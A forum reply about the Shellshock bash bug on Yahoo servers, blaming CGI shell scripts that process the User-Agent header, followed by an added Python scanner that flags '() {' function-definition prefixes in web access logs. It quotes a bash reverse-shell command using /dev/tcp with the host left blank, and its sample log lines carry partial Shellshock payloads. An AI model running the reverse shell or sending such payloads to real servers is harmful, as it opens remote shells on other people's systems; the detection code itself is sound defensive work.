Reply to post: Re: Bash is Bollocks for security

Yahoo servers? SHELLSHOCKED? by Bash?

Destroy All Monsters Silver badge

Re: Bash is Bollocks for security

Amazingly, a tool is being used as a tool.

Even in a "minimal system" the tools to do maintenance must still be available from time to time. Unless we are talking embedded.

Whether "Bash is Bollocks for security" is neither here nor there.

The error here consists in making the Swiss Army knife usable from outside. That is a combination of using shell scripts to process the "Agent" header and having that bash bug. The error does not consist in having the Swiss Army knife available in the first place.

"/bin/bash -i >&/dev/tcp/ 0>&1" does not do a whole lot. Would it work with any other shell on a system which has nice features underneath /dev/tcp? I sure hope so.

Why use shell scripts to process that "Agent" header? Well, now, that is the REAL question. They should have been gotten rid of some time ago.
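
An added example, not part of the comment above and not code from any project it mentions: a log check for the condition the comment describes, where a request header ends up in front of bash. It assumes access logs in Combined Log Format and flags Referer or User-Agent values that begin with bash's function-definition prefix "() {"; the function names and the sample lines are constructed for illustration.

```python
import re

# A CGI handler receives request headers as environment variables
# (e.g. HTTP_USER_AGENT). The bash bug treated a value that starts with
# "() {" as a function definition to import. This pattern is slightly
# looser (optional whitespace) so that near-variants are also flagged.
FUNC_PREFIX = re.compile(r"^\s*\(\)\s*\{")

# Combined Log Format:
# ip ident user [time] "request" status bytes "referer" "agent"
QUOTED = r'"((?:[^"\\]|\\.)*)"'  # quoted field, tolerating \" escapes
LOG_LINE = re.compile(
    r"^(\S+) \S+ \S+ \[[^\]]+\] " + QUOTED + r" \d{3} \S+ "
    + QUOTED + " " + QUOTED + r"\s*$"
)

def flagged_headers(line):
    """Return (ip, [field names]) for a parsed line, or None if unparseable."""
    m = LOG_LINE.match(line)
    if m is None:
        return None
    ip, _request, referer, agent = m.groups()
    fields = [name for name, value in (("referer", referer), ("agent", agent))
              if FUNC_PREFIX.match(value)]
    return ip, fields

def scan(lines):
    """Return [(line_number, ip, fields)] for lines with a flagged header."""
    hits = []
    for number, line in enumerate(lines, 1):
        parsed = flagged_headers(line)
        if parsed and parsed[1]:
            hits.append((number, parsed[0], parsed[1]))
    return hits

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2015:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 - - [01/Jan/2015:10:00:02 +0000] "GET /cgi-bin/status HTTP/1.1" 200 94 "-" "() { :; }; [trailing command elided]"',
    '203.0.113.5 - - [01/Jan/2015:10:00:03 +0000] "GET /cgi-bin/status HTTP/1.1" 200 94 "() { x; }; [trailing command elided]" "ExampleClient/1.0"',
    '192.0.2.11 - - [01/Jan/2015:10:00:04 +0000] "GET /a HTTP/1.1" 200 10 "-" "Agent () { not at start"',
]

if __name__ == "__main__":
    for number, ip, fields in scan(SAMPLE):
        print(f"line {number}: {ip} function-definition prefix in {', '.join(fields)}")
```

A hit only shows that such a header was sent; whether it reached a shell depends on the handler behind the requested path, which is the point the comment makes.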
